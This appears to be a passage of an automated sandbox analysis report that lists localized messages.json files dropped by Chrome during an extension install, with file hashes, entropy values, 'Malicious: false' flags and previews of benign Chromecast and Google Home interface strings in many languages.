C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\nb\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15155
Entropy (8bit):	5.2408655429422515
Encrypted:	false
SSDEEP:	192:5Pvl9prfckKJ+3kEUroBsL78Z4XyfhV6c8TEKdl:9vhrkDJ+UEUroE78OCJV6uml
MD5:	ED99169537909291BCC1ED1EA7BB63F0
SHA1:	5F72D51B6DBE8C622EF33D2B2AEBD7E9E20DAFB3
SHA-256:	65B6598225ADA1E14EE9CB76CA863708E8F9EE0724B4EDC8F9508532BD631BAB
SHA-512:	452704BFC109EEBDE7C9D83CFC9EADA7471989CA7D30F5C8754B6C2B026100A87C8D9ED49A09E398CEBA8B837829E2D9C6772EEEAF1AFA506F35BDDF25C20C23
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Fryser".. },.. "1213957982723875920": {.. "message": "Hvilket av f.lgende eksempler beskriver nettverket ditt best?".. },.. "128276876460319075": {.. "message": "Enhetsgjenkjenning".. },.. "1428448869078126731": {.. "message": "Videojevnhet".. },.. "1522140683318860351": {.. "message": "Tilkoblingen mislyktes. Pr.v p. nytt.".. },.. "1550904064710828958": {.. "message": "Jevn".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Ser du Chromecasten din i $START_LINK$Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START_SPAN":

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\nl\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15327
Entropy (8bit):	5.221212691380602
Encrypted:	false
SSDEEP:	192:0Yiepr1oh/Kd1sko8MrIpL72Izq8pXL2vVRmdKV6c8TEKdl:04r60Xo8MrIpLpRXL0G0V6uml
MD5:	E9236F0B36764D22EEC86B717602241E
SHA1:	DE82B804B18933907095DEF3F2EF164C1BB5F9B6
SHA-256:	300F4F7C45EBE39EAAF40776C28D0A399A710699AAB58E9A8D43A6FD2DD00376
SHA-512:	BB8A81D5D1C3FB3CA05149137852CAC213DEECB0437DA85472D5C03DAEFFE28D73007D7921740E56FE8B79544F529670600D47B86C4F27BF45C090B4D55F23F7
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Loopt vast".. },.. "1213957982723875920": {.. "message": "Welke beschrijving past het beste bij je netwerk?".. },.. "128276876460319075": {.. "message": "Apparaatdetectie".. },.. "1428448869078126731": {.. "message": "Vloeiendheid van de video".. },.. "1522140683318860351": {.. "message": "Kan geen verbinding maken. Probeer het opnieuw.".. },.. "1550904064710828958": {.. "message": "Vloeiend".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Zie je je Chromecast in de $START_LINK$Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\pl\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15418
Entropy (8bit):	5.346020722930065
Encrypted:	false
SSDEEP:	192:PBUprktnFwP5GkzF0r2Q3SdIucDGGmPlTV6c8TEKdl:ur2CDur2kT9aGydV6uml
MD5:	8254020C39A5F6C1716639CC530BB0D6
SHA1:	A97A70427581ADA902CA73C898825F7B4B4FAC8F
SHA-256:	2F4E4FC6AEB4A8E7F0E0DCE220D66E763F4EBF1FA79985834D636C6692FEA3E8
SHA-512:	9A2CD0F061A943CE04789FF259ECE5B3CCA11EBB6C1DF16C703F70394A5F89415E8EFB79CFB4646FC07FD261170A74602644FFF02ABD38548895CDF7DAB68EB6
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Zatrzymuje si.".. },.. "1213957982723875920": {.. "message": "Kt.ra z tych opcji najlepiej opisuje Twoj. sie.?".. },.. "128276876460319075": {.. "message": "Wykrywanie urz.dze.".. },.. "1428448869078126731": {.. "message": "P.ynno.. obrazu".. },.. "1522140683318860351": {.. "message": "Nie uda.o si. nawi.za. po..czenia. Spr.buj ponownie.".. },.. "1550904064710828958": {.. "message": "P.ynna".. },.. "1636686747687494376": {.. "message": "Idealna".. },.. "1802762746589457177": {.. "message": "G.o.no..".. },.. "1850397500312020388": {.. "message": "Czy Chromecasta wida. w.$START_LINK$aplikacji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\pt\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15475
Entropy (8bit):	5.239856689212255
Encrypted:	false
SSDEEP:	192:L9PpriI0RYHf8kfrvvI/99T+BEsV6c8TEKdl:LrkYPfrgsV6uml
MD5:	FABD5D64267F0E6D7BE6983AB8704F8C
SHA1:	D4DAAD0FF5C461C51E6C1FD22B86AFC5B13E123F
SHA-256:	D82DCA262FF005668B252B478DEDAAC4A5C1E417AF9DE57C22F169A6680183AE
SHA-512:	AD8B2129DCB4F232AEDD7A2B90AF2EFA43497F9118C27AB843D279F7B0EDF70AF95251B46C8098AA831FEC0B2AF6AB0308D3DCFD9AE87BEA8AD9E0D1032E0F8B
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Congela".. },.. "1213957982723875920": {.. "message": "Qual das seguintes alternativas melhor descreve sua rede?".. },.. "128276876460319075": {.. "message": "Detec..o de dispositivos".. },.. "1428448869078126731": {.. "message": "Suavidade da reprodu..o do v.deo".. },.. "1522140683318860351": {.. "message": "Falha na conex.o. Tente novamente.".. },.. "1550904064710828958": {.. "message": "Suave".. },.. "1636686747687494376": {.. "message": "Perfeita".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": ". poss.vel encontrar seu Chromecast no $START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ro\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15655
Entropy (8bit):	5.288239072087021
Encrypted:	false
SSDEEP:	192:rpzpr34BALdvonekYFJr2RlYh7YU95cep3AnjYCV6c8TEKdl:HrIqLdv0VYFJrT95c8VCV6uml
MD5:	75E16A8FB75A9A168CFF86388F190C99
SHA1:	C27CE4C1DB3DF2D232925C73DC9AC1FA24DAD396
SHA-256:	9C4716FF42A730F1E7725F0D9E703F311E79FDA31F85B4BB0B8863FC3C27AB9D
SHA-512:	9E0BF56560B1D73F9706FF6AA2D5628CBE58EFCE197899A7EE686B2395D0FA2F9927538DD9B7B152CE2DED4708A210DA3DD6F5350E62AF853E809782997B1922
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Redare cu bloc.ri".. },.. "1213957982723875920": {.. "message": "Care dintre urm.toarele descrie cel mai bine re.eaua ta?".. },.. "128276876460319075": {.. "message": "Descoperirea dispozitivelor".. },.. "1428448869078126731": {.. "message": "Calitatea red.rii videoclipului".. },.. "1522140683318860351": {.. "message": "Conexiunea nu s-a stabilit. .ncerca.i din nou.".. },.. "1550904064710828958": {.. "message": "Redare lin.".. },.. "1636686747687494376": {.. "message": "Redare perfect.".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Chromecastul dvs. apare .n $START_LINK$ aplica.ia Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ru\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17686
Entropy (8bit):	5.471928545648783
Encrypted:	false
SSDEEP:	192:Pu6PQpr19XtZkmVpFQkeVBSr/7Nq5k8TyIeBcrvV6c8TEKdl:ir7Q+LASrWk8CirvV6uml
MD5:	8EF94823972EA8D2FC9BB7EC09AB1846
SHA1:	4171DC9CE9D82FDA5A280517A1FE58C907D75CE3
SHA-256:	1009DB9FFA64E411B31E0780EBA43B9C9F8B05B5AC8CCA9A38514650261ABB0A
SHA-512:	83CEC6CF43F4A5A998B987DA6B6F236B36078C560F1CD79366AEBF2950ECD881F0B3ECC1C0769D911381B4A1D5901121E3620CA1AC2401BDE12642BE64EFD67A
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".........".. },.. "1213957982723875920": {.. "message": "..... .. ......... .... ........ ............. ..... ....?".. },.. "128276876460319075": {.. "message": "........ . ............ .........".. },.. "1428448869078126731": {.. "message": "............... .....".. },.. "1522140683318860351": {.. "message": ".. ....... .......... ........... ......... ........".. },.. "1550904064710828958": {.. "message": "....... ...............".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": ".. ...... .... .......... Chromecast . $START_LINK$........

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sk\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	5.409596551150113
Encrypted:	false
SSDEEP:	192:PIwprzrAXVZdrkF9PMZq6rTxnfKVSk7bVV6c8TEKdl:jrojd4F94q6rRsdVV6uml
MD5:	C314FAC15AFF6A2EE9C732C64AB5A66D
SHA1:	D51F3362B5FDD2F3756DE42D7D6227DC818C6344
SHA-256:	8EE2A25A09D6D0F89063FAA34BA2BC4DB505DD31FE6D5064C5D6E1E153721484
SHA-512:	C0387992BFD6D5EA7781A6A8112DDAF9759A3FCE0B0D954F024B4368EBAE132EB5FB6D59DE69F7C015E049339F6A170F1B41236E222D09FF41020F912E9DCD3C
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Zam.za".. },.. "1213957982723875920": {.. "message": "Ktor. z nasleduj.cich skuto.nost. najlep.ie popisuj. va.u sie.?".. },.. "128276876460319075": {.. "message": "Vyh.ad.vanie zariaden.".. },.. "1428448869078126731": {.. "message": "Plynulos. videa".. },.. "1522140683318860351": {.. "message": "Pripojenie zlyhalo. Sk.ste to znova.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "V.born.".. },.. "1802762746589457177": {.. "message": "Hlasitos.".. },.. "1850397500312020388": {.. "message": "Vid.te svoj Chromecast v.$START_LINK$aplik.cii Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sl\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15628
Entropy (8bit):	5.292871661441512
Encrypted:	false
SSDEEP:	192:Ppp0prwFOhNkcUw4kjkNOD7r31RdeYqakV6c8TEKdl:0rXjYwy4Xr34AkV6uml
MD5:	F60AB4E9A79FD6F32909AFAC226446B3
SHA1:	07C9E383D4488BEBE316CA86966FC728F55A2E32
SHA-256:	CDE581E6E7CF0136B003B45549E3BBEE7B67B74ADD786A8D5607BFDAD1DE7B87
SHA-512:	F6A7673A8EFDB7FF74D7B83DD4BCB3683031DB7FBFE6654F6311CBA53EC42F3E45CE2B42A6E385F868271BBDD348272ACF9CE304E2DB52A10B36D24C7B03114F
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Zamrzne".. },.. "1213957982723875920": {.. "message": "Kaj od tega najbolje opi.e va.e omre.je?".. },.. "128276876460319075": {.. "message": "Odkrivanje naprav".. },.. "1428448869078126731": {.. "message": "Teko.e predvajanje videoposnetka".. },.. "1522140683318860351": {.. "message": "Vzpostavitev povezave ni uspela. Poskusite znova.".. },.. "1550904064710828958": {.. "message": "Teko.e".. },.. "1636686747687494376": {.. "message": "Odli.no".. },.. "1802762746589457177": {.. "message": "Glasnost".. },.. "1850397500312020388": {.. "message": "Ali je Chromecast viden v $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17769
Entropy (8bit):	5.433657867664831
Encrypted:	false
SSDEEP:	192:AtUpr9riVEviVutkeV74ErILfWloyWR5Roxj2V6c8TEKdl:AGr1pvtuWDrS9Sj2V6uml
MD5:	4E233461D805CA7E54B0B394FFF42CAB
SHA1:	77F30833FC73A4C02C652C9E5A6EAFE9C3988A30
SHA-256:	E1E1C64213EBF2CFEB7BA83E51B697CEA449B3A8B279B1024B859228DE869879
SHA-512:	7288B11E9F46CF8138E0F8305E5E43CCCCCAD75F2D37EB2515C6BD54064FDC511A5872F0A940FA44A0B1B2355D2E0AED12A0D53267AC501B4E5CB6DDE43B000D
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "......... ..".. },.. "1213957982723875920": {.. "message": ".... .. ........ ...... ....... ....... .....?".. },.. "128276876460319075": {.. "message": "......... .......".. },.. "1428448869078126731": {.. "message": "........ ............ ..... ......".. },.. "1522140683318860351": {.. "message": ".......... .... ....... ........ .......".. },.. "1550904064710828958": {.. "message": "... .......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": "...... .....".. },.. "1850397500312020388": {.. "message": "...... .. .. ...... Chromecast . $START_LINK$.......... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sv\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15135
Entropy (8bit):	5.258962752997426
Encrypted:	false
SSDEEP:	192:LY5pr2y3Lm3kONgMr6nxJNuyF5JTpg2NOV6c8TEKdl:Yr5DMrAfpOV6uml
MD5:	897DAE6B0CF0FDE42648F0B47CB26E06
SHA1:	E1F5F5F65AF34FF9484AB2B01E571EAF19BA23D0
SHA-256:	52656C24F6F6D0F3B3FC01E9504C4D5CEB85624F1B22E974CA675DD0E94EB82D
SHA-512:	399DEACFE61F4AF9B24AAA0357D30149CC49DA7825295933D3AE006714B5DE7AC5FCB9EC5340B0E3AB4ABF25641032BBBB5B7D578CD204F4EDEAFE6E08C55663
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Fastnar tillf.lligt".. },.. "1213957982723875920": {.. "message": "Vilket av f.ljande beskriver ditt n.tverk b.st?".. },.. "128276876460319075": {.. "message": "Enhetsidentifiering".. },.. "1428448869078126731": {.. "message": "J.mn videouppspelning".. },.. "1522140683318860351": {.. "message": "Det gick inte att ansluta. F.rs.k igen.".. },.. "1550904064710828958": {.. "message": "Flyter p.".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volym".. },.. "1850397500312020388": {.. "message": "Visas din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\sw\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15156
Entropy (8bit):	5.216902945207334
Encrypted:	false
SSDEEP:	192:6GprWbq4takN4kbvrwJAV5HeY9NVUpnV6c8TEKdl:nrol7rRkpnV6uml
MD5:	EC233129047C1202D87DC140F7BA266D
SHA1:	537E4C887428081365D028F32C53E3C92F29AAA6
SHA-256:	28EDBC5C4858217811D45CAA215710E452C8926E4DE99F810001AD664D08BE0D
SHA-512:	2E3F9BA1EA9EEF921E76B46B5EF2404B3B77B61F18CF67CC78C23C62202227F678A3DBE9C730E42A310800914DC53F25E8B2FBF461839DE33D3501B0BCB4EC8D
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Inasita kucheza".. },.. "1213957982723875920": {.. "message": "Ni gani kati ya zifuatazo inaelezea mtandao wako vizuri?".. },.. "128276876460319075": {.. "message": "Kupata Kifaa".. },.. "1428448869078126731": {.. "message": "Ulaini wa Kutiririsha Video".. },.. "1522140683318860351": {.. "message": "Imeshindwa kuunganisha. Tafadhali jaribu tena.".. },.. "1550904064710828958": {.. "message": "Laini".. },.. "1636686747687494376": {.. "message": "Bora".. },.. "1802762746589457177": {.. "message": "Sauti".. },.. "1850397500312020388": {.. "message": "Je, unaweza kuona Chromecast yako katika $START_LINK$ programu ya Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ta\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	20531
Entropy (8bit):	5.2537196877590056
Encrypted:	false
SSDEEP:	192:I0N4prlczmbWIO0KISBZdMx4kLQ7rgEsZatRoFkJL+KJtjV6c8TEKdl:0r/TUrRVjV6uml
MD5:	C50C5D2EDFC79DBDCBD5A58A027A3231
SHA1:	14314D760A18C39F06CD072CF5843832AFB86689
SHA-256:	EEB0E89D5AD92B80FF08F88533A111DB3416D7C3860C64227D1CC8B7C2B58298
SHA-512:	A241084C44260C239CB8E6736AB7F7D1988142DDA6CAAD9F907FB42970BE56EC8DA6956BFBE97F926C6EFA32B750F1F57815980494BC31D27DF609C04421AD42
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "................ ... ...... .............. ...... ........ ...........?".. },.. "128276876460319075": {.. "message": "...... .............".. },.. "1428448869078126731": {.. "message": ".......... ..... .....".. },.. "1522140683318860351": {.. "message": "...... ............ ........ .........".. },.. "1550904064710828958": {.. "message": "..... ......".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message": "......."

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\te\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	20495
Entropy (8bit):	5.301590673598541
Encrypted:	false
SSDEEP:	384:hcFQcIrxhljbwSb4V6Icdbf1crfrCk0ODzB+relGZqsItV6uml:KcNbw4b2reSob26uml
MD5:	F740F25488BE253FCF5355D5A7022CEE
SHA1:	203A8DF19BA5A602A43DE18E99A6615D950C450E
SHA-256:	5B9C96CB5D62510836B321EB9CEEF23865BB9D4DC4DE7716E90A858E00701FDF
SHA-512:	3FB6E32D26EEAADB94D594A5B61930B003B4DA09C282A2ABF063A4502AA725FB88E4801F8A2443CD46137BEDAE5DFD2359DCA3506EE416713D08DF6430065725
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "........".. },.. "1213957982723875920": {.. "message": "..... .......... ... .. ........... ....... ........ ............?".. },.. "128276876460319075": {.. "message": "..... ..... ....".. },.. "1428448869078126731": {.. "message": "...... ...... ......".. },.. "1522140683318860351": {.. "message": "........ .......... ...... ..... ..............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "......... ....".. },.. "1802762746589457177": {.. "message": "........".. },.. "185039750031202038

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\th\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	18849
Entropy (8bit):	5.3815746250038305
Encrypted:	false
SSDEEP:	384:GhjwMfr4c/ey18Ym7ZepIfa1hea0KEr2ucpYxcixh8V6uml:GhjwMfccGy18Ym7ZiIfa1hea0KEKucp2
MD5:	9F926FCB8BAEA23453B99EA162CCDEA1
SHA1:	04D1E45591C0435A39DCA00A81E83E68585E8B64
SHA-256:	100463C587F549C964A4EB21EA38EA1B4ADEF11E927FAC8FF884623B77202C02
SHA-512:	F226278DDF2D1995961690895361AB7B5D221C5E36D7767BBA71F36716C27B28210F85DC7DB4D2FC61B048FE2D058EE76EFBF2AD2A9714375149C4D09E18BE2B
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": ".............................................".. },.. "128276876460319075": {.. "message": "...............".. },.. "1428448869078126731": {.. "message": "....................".. },.. "1522140683318860351": {.. "message": "................... ...............".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": "..........".. },.. "1802762746589457177": {.. "message": "..........".. },.. "1850397500312020388": {.. "message": ".......... Chromecast ..... $

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\tr\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15542
Entropy (8bit):	5.336342457334077
Encrypted:	false
SSDEEP:	192:OGNSbprOWklwIc3uk+zwr5a+qF6LtP2nFjYqcV6c8TEKdl:wrfNV9r5avYqcV6uml
MD5:	B0420F071E7C6C2DE11715A0BF026C63
SHA1:	F41CC696786B18805DB8DC9E1E476146C0D6BE90
SHA-256:	309F946F753DF6AF5C255D772EA0D429462152F78ABA4A96A2E369707A2C6B67
SHA-512:	67B42FC962AB70FFF86777E5057047EF4CFFDA4BED040F9D45BB5DB0275C3B5F21B17924AE5C51C71E8B078AB88AE3001C70CDB4E1994D4C8A20DEFC3A1D34FA
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Donuyor".. },.. "1213957982723875920": {.. "message": "A..n.z. a.a..dakilerden hangisi en iyi .ekilde tan.mlar?".. },.. "128276876460319075": {.. "message": "Cihaz Bulma".. },.. "1428448869078126731": {.. "message": "Videonun D.zg.n Oynat.lmas.".. },.. "1522140683318860351": {.. "message": "Ba.lant. ba.ar.s.z oldu. L.tfen tekrar deneyin.".. },.. "1550904064710828958": {.. "message": "D.zg.n".. },.. "1636686747687494376": {.. "message": "M.kemmel".. },.. "1802762746589457177": {.. "message": "Ses d.zeyi".. },.. "1850397500312020388": {.. "message": "Chromecast'inizi $START_LINK$Google Home uygulamas.nda$END_LINK$ g.rebiliyor musunuz? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\uk\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17539
Entropy (8bit):	5.492873573147444
Encrypted:	false
SSDEEP:	384:vDBprzaoaqEv390hrTr6hlRU62cdV6uml:/BaFNe76GYX6uml
MD5:	FF06E78C06E8DFF4A422EA24F0AB3760
SHA1:	A434D1CE22DE0D2FD1842E94F5815F7B1972D1EE
SHA-256:	E209FDEF12CCEC03B4E0D5B9464F90D527E62C5BC4DD565C680661D7F282AB02
SHA-512:	8EADCC918F51A946A68AAF4D9DD7F3894BE470FD0A0550E4160D609F30C78BD55508B3DF4D62A28C0813D83C5C10F9A7BFE656A4CF519E4CC814FFB07F1E9F3B
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".. . ............ ..... ........ ...... .... ......?".. },.. "128276876460319075": {.. "message": "......... ........".. },.. "1428448869078126731": {.. "message": "......... ........... .....".. },.. "1522140683318860351": {.. "message": ".. ....... ............. ......... ........".. },.. "1550904064710828958": {.. "message": "...... ...........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".. ...... .. .... ........ Chromecast . $START_LINK$....... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeho

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\vi\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	16001
Entropy (8bit):	5.46630477806648
Encrypted:	false
SSDEEP:	192:8xyKyprnBTF0cEW5xk0rdBrQBiaiNiw+3KrV6c8TEKdl:8ULrB5yW5C0rHrOiZ5gKrV6uml
MD5:	C3A40E8433D96D7E766C011D9EC7502B
SHA1:	EAB7BFAE48B1D29B95A8AE040DE94D3500824EE3
SHA-256:	BD3D0F8CF100C96415B224011F550082D4516593CBD3631347748B7D6AD5B85A
SHA-512:	ADAD26422DCA2728BB77760C508C37888013EA4E3B980D9133FE12737B02589ACD302B4096B2BF1B772A28A2103B2E1F7210F4900468B4590B84C7BBC950F1C1
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "D.ng h.nh".. },.. "1213957982723875920": {.. "message": "Tr..ng h.p n.o sau ..y m. t. ..ng nh.t m.ng c.a b.n?".. },.. "128276876460319075": {.. "message": "Kh.m ph. thi.t b.".. },.. "1428448869078126731": {.. "message": ".. m..t c.a video".. },.. "1522140683318860351": {.. "message": "K.t n.i kh.ng th.nh c.ng. Vui l.ng th. l.i.".. },.. "1550904064710828958": {.. "message": "M..t m.".. },.. "1636686747687494376": {.. "message": "Ho.n h.o".. },.. "1802762746589457177": {.. "message": ".m l..ng".. },.. "1850397500312020388": {.. "message": "B.n c. th. nh.n th.y Chromecast c.a m.nh trong $START_LINK$.ng d.ng Google Home$END_LINK$ kh.ng? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "conte

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\zh\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	14773
Entropy (8bit):	5.670562029027517
Encrypted:	false
SSDEEP:	192:hppr6VVD8/LkiQKrTV2U00jT25kNV6c8TEKdl:hr88/YOrTjF2GV6uml
MD5:	D4513639FFC58664556B4607BF8A3F19
SHA1:	65629BC4CBBACA498F4082DD5884C8D3D7DDDC8A
SHA-256:	C6D49997A9B4FF7FE701EC3644B1A523679A27778FB4BD39B7DBCA9F1ACCE595
SHA-512:	16260FAC30D57EBFD577833F45D52FEA446ABE877D0D4015EF47C5C9072B81DDA71ED4E5E7DAFDEBE82B26556A4477EA4BFCDEC227058E381B9812DAB1F4379B
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "..".. },.. "1213957982723875920": {.. "message": "..................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": ".........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "... $START_LINK$Google Home ..$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START_SPAN": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\zh_TW\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	14981
Entropy (8bit):	5.7019494203747865
Encrypted:	false
